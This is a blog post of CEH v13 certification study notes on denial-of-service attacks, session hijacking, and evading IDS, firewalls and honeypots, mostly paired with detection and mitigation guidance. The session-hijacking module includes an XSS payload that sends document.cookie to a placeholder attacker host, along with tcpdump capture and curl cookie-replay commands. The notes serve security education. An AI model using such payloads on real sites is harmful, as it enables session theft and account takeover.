CEH V13 Detailed Notes Part IV
Posted inSecurity Certifications

CEH V13 Detailed Notes Part IV

No Comments

Introduction on modules

Module 10 — Denial-of-Service (DoS) Attacks

DoS and DDoS attacks aim to exhaust system, network, or application resources to make services unavailable.
Understand attack types — volumetric, protocol, and application-layer — and tools like LOIC, HOIC, and botnets.
Learn about mitigation: rate limiting, CDN protection, load balancing, and incident response for availability resilience.

Module 11 — Session Hijacking

Session hijacking targets user sessions by stealing or predicting session tokens to impersonate valid users.
Study TCP/IP hijacking, cross-site scripting, cookie theft, and man-in-the-middle exploitation.
Defend using SSL/TLS, secure cookie attributes, regeneration of session IDs, and intrusion detection systems.

Module 12 — Evading IDS, Firewalls, and Honeypots

Attackers use evasion techniques to bypass security monitoring systems and stay undetected.
Explore fragmentation, encryption, obfuscation, tunneling, and spoofing to slip past defenses.
Learn countermeasures like deep packet inspection, anomaly detection, and network segmentation.

Module 10: Denial-of-Service (DoS) Attacks

1. Introduction to DoS and DDoS

Definition

  • Denial-of-Service (DoS): An attack aimed at making a system or network resource unavailable to legitimate users by overwhelming it with illegitimate requests.
  • Distributed Denial-of-Service (DDoS): A large-scale DoS attack launched from multiple compromised systems (botnets), coordinated by an attacker (C2 server).

Objective

  • Exhaust resources such as:
    • Network bandwidth
    • CPU cycles
    • Memory or application threads
  • Ultimately: Disrupt availability—a key part of the CIA triad.

2. DoS Attack Categories

A. Volume-Based Attacks

  • Overwhelm bandwidth with massive traffic.
  • Examples:
    • ICMP flood (Ping flood)
    • UDP flood
    • Amplification attacks (DNS/NTP/SSDP)
  • Measurement: Bits per second (bps)

B. Protocol Attacks

  • Exploit weaknesses in Layer 3 or 4 (network/transport).
  • Examples:
    • SYN flood
    • Smurf attack
    • Ping of Death
    • Teardrop attack (fragmentation)
  • Measurement: Packets per second (pps)

C. Application-Layer Attacks

  • Target Layer 7 (HTTP, DNS, SMTP).
  • Mimic legitimate traffic to exhaust application resources.
  • Examples:
    • HTTP GET/POST floods
    • Slowloris
    • DNS query floods
  • Measurement: Requests per second (rps)

3. Common DoS Techniques and Tools

A. Network Layer

  • ICMP flood: Exploits ping packets to consume bandwidth.
  • Smurf attack: Uses ICMP echo requests to broadcast addresses with spoofed victim IP.
  • Fraggle attack: Similar to Smurf but uses UDP.
  • SYN flood: Exploits TCP 3-way handshake by sending half-open connections.

B. Application Layer

  • Slowloris: Sends partial HTTP headers to keep connections open.
  • HTTP flood: Overwhelms web servers by sending repeated legitimate-looking requests.
  • RUDY (R-U-Dead-Yet?): Submits slow HTTP POST requests to exhaust threads.

C. Distributed DoS

  • Botnets: Networks of compromised hosts (zombies) controlled via Command & Control (C2) servers.
  • Attackers can rent DDoS capabilities on the dark web (DDoS-as-a-Service).
  • Example botnets: Mirai, Mēris, Dark Nexus.

4. Amplification Attacks

Concept:

Use protocols with a larger response than request to multiply attack volume. Protocol Amplification Factor Description DNS 28–54x Open resolver exploited via spoofed queries NTP 550x Monlist command abused SSDP 30x Exploits UPnP devices Memcached 50,000x Exploits UDP mode responses

Goal: Amplify small requests into huge traffic bursts toward the victim.

5. Botnets and Attack Architecture

A. Components

  1. Botmaster / Attacker – Controls the operation.
  2. C2 Server – Issues attack commands.
  3. Bots / Zombies – Compromised devices executing the attack.
  4. Victim – Target system or service.

B. Types of C2 Control

  • IRC-based
  • HTTP-based
  • Peer-to-peer (P2P)
  • Social media-based (e.g., Twitter, Telegram)

6. DoS Tools (for Ethical Testing)

(Ethical use only in authorized environments for testing or academic purposes.)

7. Indicators of a DoS/DDoS Attack

  • Sudden network latency or unavailability
  • Unusual traffic spikes
  • Increased CPU/memory utilization
  • Service timeouts and crashes
  • Multiple connections from random IPs or geo-locations

8. Defensive Strategies and Countermeasures

A. Infrastructure-Level

  • Rate limiting / Traffic shaping
  • Blackhole & sinkhole routing
  • Geo-blocking & IP reputation filtering

B. Network-Level

  • Deploy firewalls & IDS/IPS (Snort, Suricata)
  • Use Anti-DDoS appliances or services (Cloudflare, Akamai, AWS Shield)
  • Enable TCP SYN cookies & reverse proxies

C. Application-Level

  • Web Application Firewalls (WAFs)
  • Load balancers for redundancy
  • Caching systems (CDNs) to absorb bursts

D. Architectural Defenses

  • Anycast routing
  • Content Distribution Networks
  • Redundancy & failover clustering

E. Monitoring & Response

  • Establish baselines for normal traffic.
  • Use SIEMs (e.g., Splunk, QRadar) for correlation.
  • Maintain incident response plans and perform tabletop exercises.

9. Real-World Examples

  • GitHub (2018): Memcached amplification reaching 1.35 Tbps.
  • Dyn DNS (2016): Mirai botnet disrupted major sites like Twitter, Netflix, and GitHub.
  • AWS (2020): Largest DDoS attack recorded at 2.3 Tbps.

10. Summary

11. Exam Tips

Know attack types by OSI layer.
Remember amplification factors and exploited protocols.
Understand botnet control models (IRC, HTTP, P2P).
Be ready for tool identification questions (e.g., Slowloris vs HOIC).
Focus on mitigation hierarchy (Prevent → Detect → Respond → Recover).

Module 11: Session Hijacking

1. What is Session Hijacking?

Session hijacking is the act of taking over a valid, authenticated session between a user and a service so the attacker can act as that user without logging in.
It targets session identifiers / tokens (cookies, bearer tokens, session IDs, TLS sessions, TCP sessions) rather than credentials directly.

Why it matters: If an attacker obtains a session token they can bypass authentication controls, access sensitive data, and perform privileged actions.

2. Session concepts you must know

  • Session identifier / token: random string assigned after authentication (cookie, JWT, bearer token).
  • Session fixation: attacker sets or forces a known session ID for a user, then uses it after the victim authenticates.
  • Session replay: attacker captures a valid token and reuses it later.
  • Session prediction: weak token generation allows attacker to guess valid tokens.
  • Sidejacking: stealing cookies over unencrypted networks (e.g., Wi-Fi) and using them to hijack sessions.
  • TCP/IP session hijacking: manipulating TCP sequence numbers to inject or intercept TCP traffic.

3. Main attack techniques (overview + practical indicators)

A. Cookie / Token Theft (most common)

  • Methods: sniffing (unencrypted HTTP), XSS (steal document.cookie), malware/keylogger, malicious browser extension, CSRF to force state changes.
  • Indicators: same session used from different geos/IPs, unusual activity immediately after session creation.

B. Man-in-the-Middle (MITM) & ARP poisoning

  • Attacker places themselves between client and server (ARP spoofing, rogue AP) and captures session tokens.
  • Tools: Ettercap, Bettercap, Wireshark (for capture), mitmproxy, Burp Suite (proxy).
  • Mitigation priority: encrypt traffic (TLS + HSTS), use VPNs on public Wi-Fi.

C. Cross-Site Scripting (XSS)

  • Attacker injects script that reads cookies / local storage and sends them to attacker-controlled server.
  • Example: new Image().src="https://attacker/steal?c="+document.cookie

D. Session Fixation

  • Attacker provides a session ID to a victim (link, form). If server accepts and victim logs in without regenerating ID, attacker uses same ID to access session.

E. Session Prediction

  • Weak session IDs (incremental, low entropy) can be guessed or brute-forced.
  • Indicator: predictable patterns in session IDs, low entropy token length.

F. TCP Session Hijacking (low level)

  • Attacker predicts TCP sequence numbers (older technique) or desynchronizes a connection to inject packets.
  • Rare in modern networks due to protections, but still a conceptual topic.

4. Tools & practical examples (for authorized testing / labs)

  • Passive capture: Wireshark, tcpdump — capture cookies over HTTP.
    • Example: tcpdump -i eth0 -w capture.pcap port 80 and open in Wireshark.
  • Proxy / Intercept: Burp Suite, mitmproxy — intercept and manipulate HTTP(S) (with client trusting proxy cert).
  • MITM frameworks: Ettercap, Bettercap — ARP poisoning & HTTP interception in lab.
  • Replaying tokens: curl with cookie: curl -b "session=abcd1234" https://target.example.com/dashboard
  • XSS testing: Burp + manual payloads (in lab) to confirm cookie exfiltration (always in authorized testing only).
  • Detection & testing: OWASP ZAP for automated session management tests; tools like ratproxy in older toolsets.

Ethical note: Use these tools only in labs or with explicit written permission.

5. How session hijacking is detected (for defenders)

  • Session anomalies: same session token used from multiple IP addresses or geolocations within short time.
  • Impossible travel: rapid switches between geos for same user.
  • Concurrent sessions: many simultaneous requests with same token from different sources.
  • Unexpected user-agent changes for same token.
  • IDS/IPS alerts: repeated login resets, abnormal packet injections.
  • SIEM correlation: link suspicious network captures with application logs.

Useful detection rules / behaviors:

  • Alert when a session is reused after termination.
  • Alert on repeated failed CSRF tokens or anomalous POSTs.
  • Flag when Set-Cookie events occur with missing security attributes.

6. Strong mitigations & secure session management (how to prevent hijacking)

A. Transport-level protections

  • TLS (HTTPS) everywhere. Enforce server-only cookies and HSTS to prevent downgrade/strip attacks.
  • Use secure TLS configurations (no weak ciphers, enforce TLS1.2+/avoid SSLv3).

B. Cookie & token hardening

  • Secure flag — cookie sent only over HTTPS.
  • HttpOnly flag — prevents JavaScript access to cookie (mitigates simple XSS cookie theft).
  • SameSite attribute — Strict or Lax to limit cross-site sending (reduces CSRF).
  • Set short session lifetimes and rotate tokens on privilege changes.
  • Regenerate session ID after login and on privilege escalation (prevents fixation).
  • Token entropy — generate long, cryptographically random session IDs; avoid predictability.
  • Store minimal sensitive info in session token (use server-side session store and opaque session IDs; or sign JWTs and keep short expiry).

C. Application controls

  • Revoke tokens on logout and provide server-side session invalidation (do not rely solely on client-side deletion).
  • Bind sessions to client context: store and check user-agent, IP (with care for mobile/ISP changes), device fingerprinting with fallback.
  • Implement MFA — even if token is stolen, attacker still needs second factor.
  • Use anti-CSRF tokens for state-changing requests.
  • Content Security Policy (CSP) to reduce risk of injected scripts reading cookies.

D. Network / infra controls

  • Detect and block MITM: monitor ARP anomalies, enable dynamic ARP inspection (DAI), use 802.1X for network access.
  • Require VPN / client certs for remote access to sensitive apps.
  • HTTP Strict Transport Security (HSTS) — force HTTPS for domain.

7. Best practices for session lifecycle

  1. Generate token on successful authentication.
  2. Store token server-side mapping to session state (not sensitive data).
  3. Set Secure, HttpOnly, SameSite.
  4. Regenerate token on login and privilege escalation.
  5. Implement inactivity timeout + absolute session timeout.
  6. Invalidate token on logout; blacklist tokens until expiry.
  7. Use short TTL + refresh tokens (if applicable), with refresh rotation & revocation support.
  8. Log session creation/termination and anomalous reuse.

8. Quick checklist — defensive posture

  • Enforce HTTPS with HSTS.
  • Set Secure, HttpOnly, and SameSite on cookies.
  • Regenerate and rotate session IDs on login and privilege changes.
  • Use strong random tokens (CSPRNG) with high entropy.
  • Implement MFA and short token lifetimes.
  • Log and alert on unusual session usage (multiple geos/IPs, device changes).
  • Use network protections (DAI, 802.1X, VPN) to limit MITM/ARP poisoning risk.
  • Perform periodic pen tests and session-management reviews.

Module 12: Evading IDS, Firewalls, and Honeypots

1. Module overview

Attackers don’t just try to break into systems — they want to avoid being detected while doing it. This module examines techniques adversaries use to bypass intrusion detection systems (IDS), firewall protections, and deception systems (honeypots), and it covers how defenders can detect, harden, and respond. Understanding evasion improves red-team realism and helps defenders close visibility gaps.

2. Core concepts: how detection works

IDS and IPS solutions inspect network and/or host activity for signs of compromise. Signature-based detection looks for known patterns (signatures) and is excellent for known threats. Anomaly-based detection builds a baseline of “normal” behavior and flags deviations. Firewalls enforce policy at the network and application layers, filtering or proxying traffic. Honeypots are decoy systems designed to attract attackers to study their methods. Evasion techniques either hide malicious actions from these controls or manipulate traffic so controls misclassify it as benign.

3. Evasion families and the idea behind them

Evasion techniques generally aim to do one (or more) of the following: fragment or obfuscate payloads so signatures miss them; disguise malicious traffic inside allowed protocols; slow or time-shift traffic to evade rate-based detection; encrypt or tunnel malicious content so deep inspection can’t see inside; fingerprint and avoid honeypots; or abuse legitimate services/protocols to blend in. Attackers will typically chain multiple techniques.

4. Packet-level evasion: fragmentation and insertion

Attackers split malicious payloads into many tiny fragments or craft packets with unusual offsets so a naive signature engine can’t reconstruct the original malicious content. Packet insertion and evasion occur when an attacker sends extra packets or malformed packets to create ambiguity between what endpoints see and what the IDS sees. Tools like fragroute/fragrouter (or custom packet crafting with scapy/hping3) can produce these effects. Defenders must reassemble fragments before inspection and validate protocol behavior to prevent evasion.

5. Protocol obfuscation and encoding

Malicious data can be encoded (Base64, URL encoding, double-encoded) or disguised as legitimate application-layer traffic to bypass pattern matching. For example, shellcode or exploit payloads inside seemingly harmless HTTP POST bodies or inside multipart file uploads. Attackers also use non-standard ports for common protocols (e.g., SSH on high ports) and craft protocol states to make the session appear normal. Defenders should apply deep packet inspection (DPI) and protocol-aware parsing to detect anomalies.

6. Tunneling and encryption to hide traffic

Tunneling malicious traffic over allowed protocols (HTTP(s), DNS, ICMP) hides content from simple filters. DNS tunneling and HTTP tunneling are popular: they encapsulate commands or data in DNS queries/responses or HTTP requests. Encrypted tunnels (SSL/TLS, SSH) or VPNs hide payloads from signature engines; attackers may use legitimate TLS to hide C2 or exfiltration. Defenders should use TLS inspection where feasible (with privacy and legal considerations), monitor metadata (hostnames, unusual handshake behavior), and apply behavioral baselining.

7. Timing & low-and-slow techniques

Instead of blasting payloads quickly (which triggers volume/threshold detectors), attackers send activity at low rates or spread steps across long windows to remain below detection thresholds. Examples: very slow HTTP POSTs, long gaps between command-and-control callbacks, or timed small data exfiltration. These are hard for signature systems; anomaly detection with long-term baselining and correlation is required to spot them.

8. Polymorphism and metamorphism

Polymorphic techniques change the payload signature on each instance (e.g., simple encoding or XOR), while metamorphic techniques recompile or rewrite code to change its structure. These approaches defeat signature-based AV/IDS because the byte patterns change. Behavior-based detection, sandboxing, and dynamic analysis are stronger defenses because they analyze what code does rather than how it looks.

9. Use of legitimate services and living-off-the-land

Attackers abuse legitimate tools and services already trusted inside the environment (PowerShell, WMI, system utilities, cloud storage, widely used SaaS) to reduce noise and bypass controls. This is often called “living off the land.” When an attacker’s actions are ordinary admin-like actions, signature detection struggles. Defenders should implement application allow-listing, restrict high-risk tool use, and enable command logging and behavioral analytics for admin utilities.

10. Firewall evasion techniques (concepts & examples)

Common firewall evasion methods include IP spoofing to appear as a trusted source, source-port manipulation or using ports allowed by policy (e.g., tunneling over HTTPS), and proxying through chained proxies or anonymizing networks like Tor. Port knocking is a stealthy technique where an attacker sends a secret sequence of connection attempts to open a port; conversely, attackers exploit overly permissive outbound rules to stage C2. Defenders should apply strict egress filtering, inspect HTTPS traffic where possible, and use reverse-proxy or application-level gateways for sensitive services.

11. Honeypot detection and avoidance

Attackers attempt to fingerprint their environment to determine if they’ve hit a honeypot. Indicators include unrealistic system responses, missing expected OS artifacts, predictable service banners, high latency patterns, or known honeypot process names. Advanced attackers will probe file systems, measure timing, and run benign commands to check authenticity. Effective honeypots reduce detectability by randomizing responses, mimicking real services closely, and using hybrid deception techniques. Security teams should ensure honeypots are indistinguishable from production systems to increase capture fidelity.

12. Tools commonly used for evasion (red-team examples)

  • hping3 and scapy for custom packet crafting and spoofing.
  • fragroute/fragrouter for fragmentation tests.
  • metasploit for payload encoding and polymorphic payloads.
  • stunnel, ssh tunnels, and socat for encrypted tunnels.
  • torsocks / Tor for proxy-chaining.
  • Custom scripts and lightweight C2 frameworks to shape traffic and timing.
    Use of these tools in production networks requires authorization; defenders can simulate or threat-hunt for artifact patterns these tools leave.

13. How defenders detect evasion: signs and signals

Evasion leaves traces if you look for them. Look for inconsistent protocol state transitions, mismatched packet reassembly results, unusual fragmentation patterns, repeated partial requests, or a high rate of malformed packets. Metadata anomalies such as unusual destination hostnames, abnormal session durations, or rare user-agent strings are red flags. On hosts, look for execution of rarely used admin utilities, unexpected outbound encrypted sessions, or new services that persist. Centralized logging (SIEM) with correlation rules, network telemetry, and endpoint visibility (EDR) are essential to catch subtle evasion.

14. Defensive hardening measures (practical)

  • Ensure packet reassembly and protocol normalization occur before inspection so fragmented or non-standard packets can be analyzed correctly.
  • Deploy layered detection: combine signature-based IDS with anomaly-based analytics and behavioral EDR.
  • Use TLS inspection (where legal/appropriate) and monitor TLS metadata (SNI, certificate anomalies).
  • Harden firewalls with explicit allowlists for outbound traffic, strict egress controls, and application-level proxies for critical services.
  • Enforce network segmentation and micro-segmentation so attackers cannot easily use lateral channels.
  • Implement application whitelisting and restrict the use of scripting platforms (PowerShell, WMI) or require constrained language modes and logging.
  • Harden DNS and block known tunneling domains; employ DNS logging and detection for data-in-dns patterns.
  • Rotate honeypot variants, randomize behavior, integrate deception into detection pipelines to make honeypot fingerprinting harder.
  • Maintain threat intelligence and threat-hunting playbooks that specifically search for evasion patterns.

15. Incident handling & response considerations

When evasion is suspected, isolate affected segments, preserve packet captures (PCAPs) and full system images, and escalate to threat hunting. Correlate network anomalies with endpoint telemetry to find the true source. Because evasion often hides C2 and exfil, hunt for unusual outbound connections, anomalous TLS usage, or DNS anomalies. Use sandboxing to detonate suspicious payloads and compare dynamic behavior versus static signatures.

Quick memory lines

  • Evasion = “hide in plain sight”: fragment, obfuscate, encrypt, or blend in with normal traffic.
  • Defend by normalizing traffic, applying layered detection (signature + behavior), logging everything, and adding host-level visibility.
  • Honeypots work best when indistinguishable from production and integrated into detection pipelines.
Tags:

Comments

No comments yet. Why don’t you start the discussion?

    Leave a Reply

    This site uses Akismet to reduce spam. Learn how your comment data is processed.